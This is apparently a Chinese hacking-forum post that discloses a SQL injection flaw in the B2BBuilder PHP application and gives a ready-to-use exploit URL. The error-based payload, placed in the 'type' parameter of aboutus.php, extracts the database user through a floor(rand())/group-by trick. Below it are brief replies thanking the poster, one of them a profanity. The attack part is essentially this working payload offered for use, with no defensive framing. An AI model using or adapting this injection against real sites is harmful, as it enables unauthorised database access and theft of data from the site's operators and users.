[我爱t00ls] B2BBuilder 注入漏洞
最近工作好忙,这不有时间了,看看php代码,不能生锈呢.
直接上利用方式,大家一看就懂.
直接上利用方式,大家一看就懂.
http://localhost/b2b/aboutus.php?type=12345' aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z
评论17次
收藏了,感谢楼主
这个可以有。
为啥这套程序都下载下来啊
看完了,就得回复下
感谢作者的无私奉献
支持原创,谢谢分享。
支持原创,谢谢分享。
收了谢谢啊
mlgb
支持原创,谢谢分享。
这个可以 呵呵~~~
支持下lz
呵呵,支持一下、、、、
感谢
牛BB的人啊。。求带。
收下了。都不错的
沙发